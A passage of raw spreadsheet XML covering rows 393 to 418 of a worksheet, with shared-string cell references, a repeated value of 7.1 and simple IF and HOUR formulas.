        <f>HOUR(out!$P393 -out!$N393)</f>
        <v>0</v>
      </c>
      <c r="R393" s="18"/>
      <c r="S393" s="4"/>
      <c r="T393" s="4"/>
      <c r="U393" s="4"/>
      <c r="V393" s="7"/>
    </row>
    <row r="394" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A394" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B394" s="4" t="s">
        <v>2268</v>
      </c>
      <c r="C394" s="4" t="s">
        <v>2269</v>
      </c>
      <c r="D394" s="4" t="s">
        <v>2270</v>
      </c>
      <c r="E394" s="4" t="s">
        <v>2271</v>
      </c>
      <c r="F394" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G394" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H394" s="4">
        <v>7.1</v>
      </c>
      <c r="I394" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J394" s="4"/>
      <c r="K394" s="4"/>
      <c r="L394" s="4">
        <f>IF(out!$G394="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M394" s="4"/>
      <c r="N394" s="4"/>
      <c r="O394" s="13"/>
      <c r="P394" s="4"/>
      <c r="Q394" s="13">
        <f>HOUR(out!$P394 -out!$N394)</f>
        <v>0</v>
      </c>
      <c r="R394" s="18"/>
      <c r="S394" s="4"/>
      <c r="T394" s="4"/>
      <c r="U394" s="4"/>
      <c r="V394" s="7"/>
    </row>
    <row r="395" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A395" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B395" s="4" t="s">
        <v>2272</v>
      </c>
      <c r="C395" s="4" t="s">
        <v>2273</v>
      </c>
      <c r="D395" s="4" t="s">
        <v>2274</v>
      </c>
      <c r="E395" s="4" t="s">
        <v>2275</v>
      </c>
      <c r="F395" s="4" t="s">
        <v>2276</v>
      </c>
      <c r="G395" s="4" t="s">
        <v>2277</v>
      </c>
      <c r="H395" s="4">
        <v>7.1</v>
      </c>
      <c r="I395" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J395" s="4"/>
      <c r="K395" s="4"/>
      <c r="L395" s="4">
        <f>IF(out!$G395="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M395" s="4"/>
      <c r="N395" s="4"/>
      <c r="O395" s="13"/>
      <c r="P395" s="4"/>
      <c r="Q395" s="13">
        <f>HOUR(out!$P395 -out!$N395)</f>
        <v>0</v>
      </c>
      <c r="R395" s="18"/>
      <c r="S395" s="4"/>
      <c r="T395" s="4"/>
      <c r="U395" s="4"/>
      <c r="V395" s="7"/>
    </row>
    <row r="396" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A396" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B396" s="4" t="s">
        <v>2278</v>
      </c>
      <c r="C396" s="4" t="s">
        <v>2279</v>
      </c>
      <c r="D396" s="4" t="s">
        <v>2280</v>
      </c>
      <c r="E396" s="4" t="s">
        <v>2281</v>
      </c>
      <c r="F396" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G396" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H396" s="4">
        <v>7.1</v>
      </c>
      <c r="I396" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J396" s="4"/>
      <c r="K396" s="4"/>
      <c r="L396" s="4">
        <f>IF(out!$G396="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M396" s="4"/>
      <c r="N396" s="4"/>
      <c r="O396" s="13"/>
      <c r="P396" s="4"/>
      <c r="Q396" s="13">
        <f>HOUR(out!$P396 -out!$N396)</f>
        <v>0</v>
      </c>
      <c r="R396" s="18"/>
      <c r="S396" s="4"/>
      <c r="T396" s="4"/>
      <c r="U396" s="4"/>
      <c r="V396" s="7"/>
    </row>
    <row r="397" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A397" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B397" s="4" t="s">
        <v>2282</v>
      </c>
      <c r="C397" s="4" t="s">
        <v>2283</v>
      </c>
      <c r="D397" s="4" t="s">
        <v>2284</v>
      </c>
      <c r="E397" s="4" t="s">
        <v>2285</v>
      </c>
      <c r="F397" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G397" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H397" s="4">
        <v>7.1</v>
      </c>
      <c r="I397" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J397" s="4"/>
      <c r="K397" s="4"/>
      <c r="L397" s="4">
        <f>IF(out!$G397="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M397" s="4"/>
      <c r="N397" s="4"/>
      <c r="O397" s="13"/>
      <c r="P397" s="4"/>
      <c r="Q397" s="13">
        <f>HOUR(out!$P397 -out!$N397)</f>
        <v>0</v>
      </c>
      <c r="R397" s="18"/>
      <c r="S397" s="4"/>
      <c r="T397" s="4"/>
      <c r="U397" s="4"/>
      <c r="V397" s="7"/>
    </row>
    <row r="398" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A398" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B398" s="4" t="s">
        <v>2286</v>
      </c>
      <c r="C398" s="4" t="s">
        <v>2287</v>
      </c>
      <c r="D398" s="4" t="s">
        <v>2288</v>
      </c>
      <c r="E398" s="4" t="s">
        <v>2289</v>
      </c>
      <c r="F398" s="4" t="s">
        <v>745</v>
      </c>
      <c r="G398" s="4" t="s">
        <v>746</v>
      </c>
      <c r="H398" s="4">
        <v>7.1</v>
      </c>
      <c r="I398" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J398" s="4"/>
      <c r="K398" s="4"/>
      <c r="L398" s="4">
        <f>IF(out!$G398="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M398" s="4"/>
      <c r="N398" s="4"/>
      <c r="O398" s="13"/>
      <c r="P398" s="4"/>
      <c r="Q398" s="13">
        <f>HOUR(out!$P398 -out!$N398)</f>
        <v>0</v>
      </c>
      <c r="R398" s="18"/>
      <c r="S398" s="4"/>
      <c r="T398" s="4"/>
      <c r="U398" s="4"/>
      <c r="V398" s="7"/>
    </row>
    <row r="399" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A399" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B399" s="4" t="s">
        <v>2290</v>
      </c>
      <c r="C399" s="4" t="s">
        <v>2291</v>
      </c>
      <c r="D399" s="4" t="s">
        <v>2292</v>
      </c>
      <c r="E399" s="4" t="s">
        <v>2293</v>
      </c>
      <c r="F399" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G399" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H399" s="4">
        <v>7.1</v>
      </c>
      <c r="I399" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J399" s="4"/>
      <c r="K399" s="4"/>
      <c r="L399" s="4">
        <f>IF(out!$G399="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M399" s="4"/>
      <c r="N399" s="4"/>
      <c r="O399" s="13"/>
      <c r="P399" s="4"/>
      <c r="Q399" s="13">
        <f>HOUR(out!$P399 -out!$N399)</f>
        <v>0</v>
      </c>
      <c r="R399" s="18"/>
      <c r="S399" s="4"/>
      <c r="T399" s="4"/>
      <c r="U399" s="4"/>
      <c r="V399" s="7"/>
    </row>
    <row r="400" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A400" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B400" s="4" t="s">
        <v>2294</v>
      </c>
      <c r="C400" s="4" t="s">
        <v>2295</v>
      </c>
      <c r="D400" s="4" t="s">
        <v>2296</v>
      </c>
      <c r="E400" s="4" t="s">
        <v>2297</v>
      </c>
      <c r="F400" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G400" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H400" s="4">
        <v>7.1</v>
      </c>
      <c r="I400" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J400" s="4"/>
      <c r="K400" s="4"/>
      <c r="L400" s="4">
        <f>IF(out!$G400="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M400" s="4"/>
      <c r="N400" s="4"/>
      <c r="O400" s="13"/>
      <c r="P400" s="4"/>
      <c r="Q400" s="13">
        <f>HOUR(out!$P400 -out!$N400)</f>
        <v>0</v>
      </c>
      <c r="R400" s="18"/>
      <c r="S400" s="4"/>
      <c r="T400" s="4"/>
      <c r="U400" s="4"/>
      <c r="V400" s="7"/>
    </row>
    <row r="401" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A401" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B401" s="4" t="s">
        <v>2298</v>
      </c>
      <c r="C401" s="4" t="s">
        <v>2299</v>
      </c>
      <c r="D401" s="4" t="s">
        <v>2300</v>
      </c>
      <c r="E401" s="4" t="s">
        <v>2301</v>
      </c>
      <c r="F401" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G401" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H401" s="4">
        <v>7.1</v>
      </c>
      <c r="I401" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J401" s="4"/>
      <c r="K401" s="4"/>
      <c r="L401" s="4">
        <f>IF(out!$G401="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M401" s="4"/>
      <c r="N401" s="4"/>
      <c r="O401" s="13"/>
      <c r="P401" s="4"/>
      <c r="Q401" s="13">
        <f>HOUR(out!$P401 -out!$N401)</f>
        <v>0</v>
      </c>
      <c r="R401" s="18"/>
      <c r="S401" s="4"/>
      <c r="T401" s="4"/>
      <c r="U401" s="4"/>
      <c r="V401" s="7"/>
    </row>
    <row r="402" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A402" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B402" s="4" t="s">
        <v>2302</v>
      </c>
      <c r="C402" s="4" t="s">
        <v>2303</v>
      </c>
      <c r="D402" s="4" t="s">
        <v>2304</v>
      </c>
      <c r="E402" s="4" t="s">
        <v>2305</v>
      </c>
      <c r="F402" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G402" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H402" s="4">
        <v>7.1</v>
      </c>
      <c r="I402" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J402" s="4"/>
      <c r="K402" s="4"/>
      <c r="L402" s="4">
        <f>IF(out!$G402="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M402" s="4"/>
      <c r="N402" s="4"/>
      <c r="O402" s="13"/>
      <c r="P402" s="4"/>
      <c r="Q402" s="13">
        <f>HOUR(out!$P402 -out!$N402)</f>
        <v>0</v>
      </c>
      <c r="R402" s="18"/>
      <c r="S402" s="4"/>
      <c r="T402" s="4"/>
      <c r="U402" s="4"/>
      <c r="V402" s="7"/>
    </row>
    <row r="403" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A403" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B403" s="4" t="s">
        <v>2306</v>
      </c>
      <c r="C403" s="4" t="s">
        <v>2307</v>
      </c>
      <c r="D403" s="4" t="s">
        <v>2308</v>
      </c>
      <c r="E403" s="4" t="s">
        <v>2309</v>
      </c>
      <c r="F403" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G403" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H403" s="4">
        <v>7.1</v>
      </c>
      <c r="I403" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J403" s="4"/>
      <c r="K403" s="4"/>
      <c r="L403" s="4">
        <f>IF(out!$G403="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M403" s="4"/>
      <c r="N403" s="4"/>
      <c r="O403" s="13"/>
      <c r="P403" s="4"/>
      <c r="Q403" s="13">
        <f>HOUR(out!$P403 -out!$N403)</f>
        <v>0</v>
      </c>
      <c r="R403" s="18"/>
      <c r="S403" s="4"/>
      <c r="T403" s="4"/>
      <c r="U403" s="4"/>
      <c r="V403" s="7"/>
    </row>
    <row r="404" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A404" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B404" s="4" t="s">
        <v>2310</v>
      </c>
      <c r="C404" s="4" t="s">
        <v>2311</v>
      </c>
      <c r="D404" s="4" t="s">
        <v>2312</v>
      </c>
      <c r="E404" s="4" t="s">
        <v>2313</v>
      </c>
      <c r="F404" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G404" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H404" s="4">
        <v>7.1</v>
      </c>
      <c r="I404" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J404" s="4"/>
      <c r="K404" s="4"/>
      <c r="L404" s="4">
        <f>IF(out!$G404="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M404" s="4"/>
      <c r="N404" s="4"/>
      <c r="O404" s="13"/>
      <c r="P404" s="4"/>
      <c r="Q404" s="13">
        <f>HOUR(out!$P404 -out!$N404)</f>
        <v>0</v>
      </c>
      <c r="R404" s="18"/>
      <c r="S404" s="4"/>
      <c r="T404" s="4"/>
      <c r="U404" s="4"/>
      <c r="V404" s="7"/>
    </row>
    <row r="405" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A405" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B405" s="4" t="s">
        <v>2314</v>
      </c>
      <c r="C405" s="4" t="s">
        <v>2315</v>
      </c>
      <c r="D405" s="4" t="s">
        <v>2316</v>
      </c>
      <c r="E405" s="4" t="s">
        <v>2317</v>
      </c>
      <c r="F405" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G405" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H405" s="4">
        <v>7.1</v>
      </c>
      <c r="I405" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J405" s="4"/>
      <c r="K405" s="4"/>
      <c r="L405" s="4">
        <f>IF(out!$G405="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M405" s="4"/>
      <c r="N405" s="4"/>
      <c r="O405" s="13"/>
      <c r="P405" s="4"/>
      <c r="Q405" s="13">
        <f>HOUR(out!$P405 -out!$N405)</f>
        <v>0</v>
      </c>
      <c r="R405" s="18"/>
      <c r="S405" s="4"/>
      <c r="T405" s="4"/>
      <c r="U405" s="4"/>
      <c r="V405" s="7"/>
    </row>
    <row r="406" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A406" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B406" s="4" t="s">
        <v>2318</v>
      </c>
      <c r="C406" s="4" t="s">
        <v>2319</v>
      </c>
      <c r="D406" s="4" t="s">
        <v>2320</v>
      </c>
      <c r="E406" s="4" t="s">
        <v>2321</v>
      </c>
      <c r="F406" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G406" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H406" s="4">
        <v>7.1</v>
      </c>
      <c r="I406" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J406" s="4"/>
      <c r="K406" s="4"/>
      <c r="L406" s="4">
        <f>IF(out!$G406="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M406" s="4"/>
      <c r="N406" s="4"/>
      <c r="O406" s="13"/>
      <c r="P406" s="4"/>
      <c r="Q406" s="13">
        <f>HOUR(out!$P406 -out!$N406)</f>
        <v>0</v>
      </c>
      <c r="R406" s="18"/>
      <c r="S406" s="4"/>
      <c r="T406" s="4"/>
      <c r="U406" s="4"/>
      <c r="V406" s="7"/>
    </row>
    <row r="407" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A407" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B407" s="4" t="s">
        <v>2322</v>
      </c>
      <c r="C407" s="4" t="s">
        <v>2323</v>
      </c>
      <c r="D407" s="4" t="s">
        <v>2324</v>
      </c>
      <c r="E407" s="4" t="s">
        <v>2325</v>
      </c>
      <c r="F407" s="4" t="s">
        <v>2326</v>
      </c>
      <c r="G407" s="4" t="s">
        <v>2327</v>
      </c>
      <c r="H407" s="4">
        <v>7.1</v>
      </c>
      <c r="I407" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J407" s="4"/>
      <c r="K407" s="4"/>
      <c r="L407" s="4">
        <f>IF(out!$G407="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M407" s="4"/>
      <c r="N407" s="4"/>
      <c r="O407" s="13"/>
      <c r="P407" s="4"/>
      <c r="Q407" s="13">
        <f>HOUR(out!$P407 -out!$N407)</f>
        <v>0</v>
      </c>
      <c r="R407" s="18"/>
      <c r="S407" s="4"/>
      <c r="T407" s="4"/>
      <c r="U407" s="4"/>
      <c r="V407" s="7"/>
    </row>
    <row r="408" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A408" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B408" s="4" t="s">
        <v>2328</v>
      </c>
      <c r="C408" s="4" t="s">
        <v>2329</v>
      </c>
      <c r="D408" s="4" t="s">
        <v>2330</v>
      </c>
      <c r="E408" s="4" t="s">
        <v>2331</v>
      </c>
      <c r="F408" s="4" t="s">
        <v>2332</v>
      </c>
      <c r="G408" s="4" t="s">
        <v>2333</v>
      </c>
      <c r="H408" s="4">
        <v>7.1</v>
      </c>
      <c r="I408" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J408" s="4"/>
      <c r="K408" s="4"/>
      <c r="L408" s="4">
        <f>IF(out!$G408="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M408" s="4"/>
      <c r="N408" s="4"/>
      <c r="O408" s="13"/>
      <c r="P408" s="4"/>
      <c r="Q408" s="13">
        <f>HOUR(out!$P408 -out!$N408)</f>
        <v>0</v>
      </c>
      <c r="R408" s="18"/>
      <c r="S408" s="4"/>
      <c r="T408" s="4"/>
      <c r="U408" s="4"/>
      <c r="V408" s="7"/>
    </row>
    <row r="409" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A409" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B409" s="4" t="s">
        <v>2334</v>
      </c>
      <c r="C409" s="4" t="s">
        <v>2335</v>
      </c>
      <c r="D409" s="4" t="s">
        <v>2336</v>
      </c>
      <c r="E409" s="4" t="s">
        <v>2337</v>
      </c>
      <c r="F409" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G409" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H409" s="4">
        <v>7.1</v>
      </c>
      <c r="I409" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J409" s="4"/>
      <c r="K409" s="4"/>
      <c r="L409" s="4">
        <f>IF(out!$G409="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M409" s="4"/>
      <c r="N409" s="4"/>
      <c r="O409" s="13"/>
      <c r="P409" s="4"/>
      <c r="Q409" s="13">
        <f>HOUR(out!$P409 -out!$N409)</f>
        <v>0</v>
      </c>
      <c r="R409" s="18"/>
      <c r="S409" s="4"/>
      <c r="T409" s="4"/>
      <c r="U409" s="4"/>
      <c r="V409" s="7"/>
    </row>
    <row r="410" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A410" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B410" s="4" t="s">
        <v>2338</v>
      </c>
      <c r="C410" s="4" t="s">
        <v>2339</v>
      </c>
      <c r="D410" s="4" t="s">
        <v>2340</v>
      </c>
      <c r="E410" s="4" t="s">
        <v>2341</v>
      </c>
      <c r="F410" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G410" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H410" s="4">
        <v>7.1</v>
      </c>
      <c r="I410" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J410" s="4"/>
      <c r="K410" s="4"/>
      <c r="L410" s="4">
        <f>IF(out!$G410="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M410" s="4"/>
      <c r="N410" s="4"/>
      <c r="O410" s="13"/>
      <c r="P410" s="4"/>
      <c r="Q410" s="13">
        <f>HOUR(out!$P410 -out!$N410)</f>
        <v>0</v>
      </c>
      <c r="R410" s="18"/>
      <c r="S410" s="4"/>
      <c r="T410" s="4"/>
      <c r="U410" s="4"/>
      <c r="V410" s="7"/>
    </row>
    <row r="411" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A411" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B411" s="4" t="s">
        <v>2342</v>
      </c>
      <c r="C411" s="4" t="s">
        <v>2343</v>
      </c>
      <c r="D411" s="4" t="s">
        <v>2344</v>
      </c>
      <c r="E411" s="4" t="s">
        <v>2345</v>
      </c>
      <c r="F411" s="4" t="s">
        <v>2346</v>
      </c>
      <c r="G411" s="4" t="s">
        <v>2347</v>
      </c>
      <c r="H411" s="4">
        <v>7.1</v>
      </c>
      <c r="I411" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J411" s="4"/>
      <c r="K411" s="4"/>
      <c r="L411" s="4">
        <f>IF(out!$G411="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M411" s="4"/>
      <c r="N411" s="4"/>
      <c r="O411" s="13"/>
      <c r="P411" s="4"/>
      <c r="Q411" s="13">
        <f>HOUR(out!$P411 -out!$N411)</f>
        <v>0</v>
      </c>
      <c r="R411" s="18"/>
      <c r="S411" s="4"/>
      <c r="T411" s="4"/>
      <c r="U411" s="4"/>
      <c r="V411" s="7"/>
    </row>
    <row r="412" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A412" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B412" s="4" t="s">
        <v>2348</v>
      </c>
      <c r="C412" s="4" t="s">
        <v>2349</v>
      </c>
      <c r="D412" s="4" t="s">
        <v>2350</v>
      </c>
      <c r="E412" s="4" t="s">
        <v>2351</v>
      </c>
      <c r="F412" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G412" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H412" s="4">
        <v>7.1</v>
      </c>
      <c r="I412" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J412" s="4"/>
      <c r="K412" s="4"/>
      <c r="L412" s="4">
        <f>IF(out!$G412="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M412" s="4"/>
      <c r="N412" s="4"/>
      <c r="O412" s="13"/>
      <c r="P412" s="4"/>
      <c r="Q412" s="13">
        <f>HOUR(out!$P412 -out!$N412)</f>
        <v>0</v>
      </c>
      <c r="R412" s="18"/>
      <c r="S412" s="4"/>
      <c r="T412" s="4"/>
      <c r="U412" s="4"/>
      <c r="V412" s="7"/>
    </row>
    <row r="413" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A413" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B413" s="4" t="s">
        <v>2352</v>
      </c>
      <c r="C413" s="4" t="s">
        <v>2353</v>
      </c>
      <c r="D413" s="4" t="s">
        <v>2354</v>
      </c>
      <c r="E413" s="4" t="s">
        <v>2355</v>
      </c>
      <c r="F413" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G413" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H413" s="4">
        <v>7.1</v>
      </c>
      <c r="I413" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J413" s="4"/>
      <c r="K413" s="4"/>
      <c r="L413" s="4">
        <f>IF(out!$G413="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M413" s="4"/>
      <c r="N413" s="4"/>
      <c r="O413" s="13"/>
      <c r="P413" s="4"/>
      <c r="Q413" s="13">
        <f>HOUR(out!$P413 -out!$N413)</f>
        <v>0</v>
      </c>
      <c r="R413" s="18"/>
      <c r="S413" s="4"/>
      <c r="T413" s="4"/>
      <c r="U413" s="4"/>
      <c r="V413" s="7"/>
    </row>
    <row r="414" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A414" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B414" s="4" t="s">
        <v>2356</v>
      </c>
      <c r="C414" s="4" t="s">
        <v>2357</v>
      </c>
      <c r="D414" s="4" t="s">
        <v>2358</v>
      </c>
      <c r="E414" s="4" t="s">
        <v>2359</v>
      </c>
      <c r="F414" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G414" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H414" s="4">
        <v>7.1</v>
      </c>
      <c r="I414" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J414" s="4"/>
      <c r="K414" s="4"/>
      <c r="L414" s="4">
        <f>IF(out!$G414="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M414" s="4"/>
      <c r="N414" s="4"/>
      <c r="O414" s="13"/>
      <c r="P414" s="4"/>
      <c r="Q414" s="13">
        <f>HOUR(out!$P414 -out!$N414)</f>
        <v>0</v>
      </c>
      <c r="R414" s="18"/>
      <c r="S414" s="4"/>
      <c r="T414" s="4"/>
      <c r="U414" s="4"/>
      <c r="V414" s="7"/>
    </row>
    <row r="415" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A415" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B415" s="4" t="s">
        <v>2360</v>
      </c>
      <c r="C415" s="4" t="s">
        <v>2361</v>
      </c>
      <c r="D415" s="4" t="s">
        <v>2362</v>
      </c>
      <c r="E415" s="4" t="s">
        <v>2363</v>
      </c>
      <c r="F415" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G415" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H415" s="4">
        <v>7.1</v>
      </c>
      <c r="I415" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J415" s="4"/>
      <c r="K415" s="4"/>
      <c r="L415" s="4">
        <f>IF(out!$G415="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M415" s="4"/>
      <c r="N415" s="4"/>
      <c r="O415" s="13"/>
      <c r="P415" s="4"/>
      <c r="Q415" s="13">
        <f>HOUR(out!$P415 -out!$N415)</f>
        <v>0</v>
      </c>
      <c r="R415" s="18"/>
      <c r="S415" s="4"/>
      <c r="T415" s="4"/>
      <c r="U415" s="4"/>
      <c r="V415" s="7"/>
    </row>
    <row r="416" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A416" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B416" s="4" t="s">
        <v>2364</v>
      </c>
      <c r="C416" s="4" t="s">
        <v>2365</v>
      </c>
      <c r="D416" s="4" t="s">
        <v>2366</v>
      </c>
      <c r="E416" s="4" t="s">
        <v>2367</v>
      </c>
      <c r="F416" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G416" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H416" s="4">
        <v>7.1</v>
      </c>
      <c r="I416" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J416" s="4"/>
      <c r="K416" s="4"/>
      <c r="L416" s="4">
        <f>IF(out!$G416="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M416" s="4"/>
      <c r="N416" s="4"/>
      <c r="O416" s="13"/>
      <c r="P416" s="4"/>
      <c r="Q416" s="13">
        <f>HOUR(out!$P416 -out!$N416)</f>
        <v>0</v>
      </c>
      <c r="R416" s="18"/>
      <c r="S416" s="4"/>
      <c r="T416" s="4"/>
      <c r="U416" s="4"/>
      <c r="V416" s="7"/>
    </row>
    <row r="417" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A417" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B417" s="4" t="s">
        <v>2368</v>
      </c>
      <c r="C417" s="4" t="s">
        <v>2369</v>
      </c>
      <c r="D417" s="4" t="s">
        <v>2370</v>
      </c>
      <c r="E417" s="4" t="s">
        <v>2371</v>
      </c>
      <c r="F417" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G417" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H417" s="4">
        <v>7.1</v>
      </c>
      <c r="I417" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J417" s="4"/>
      <c r="K417" s="4"/>
      <c r="L417" s="4">
        <f>IF(out!$G417="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M417" s="4"/>
      <c r="N417" s="4"/>
      <c r="O417" s="13"/>
      <c r="P417" s="4"/>
      <c r="Q417" s="13">
        <f>HOUR(out!$P417 -out!$N417)</f>
        <v>0</v>
      </c>
      <c r="R417" s="18"/>
      <c r="S417" s="4"/>
      <c r="T417" s="4"/>
      <c r="U417" s="4"/>
      <c r="V417" s="7"/>
    </row>
    <row r="418" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A418" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B418" s="4" t="s">
        <v>2372</v>
      </c>
      <c r="C418" s="4" t="s">
        <v>2373</v>
      </c>
      <c r="D418" s="4" t="s">
        <v>2374</v>
      </c>
      <c r="E418" s="4" t="s">
        <v>2375</v>
      </c>
      <c r="F418" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G418" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H418" s="4">
        <v>7.1</v>
      </c>
      <c r="I418" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J418" s="4"/>
      <c r="K418" s="4"/>
      <c r="L418" s="4">
        <f>IF(out!$G418="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M418" s="4"/>
      <c r="N418" s="4"/>
      <c r="O418" s="13"/>
      <c r="P418" s="4"/>
      <c r="Q418" s="13">
        <f>HOUR(out!$P418 -out!$N418)</f>
        <v>0</v>
      </c>
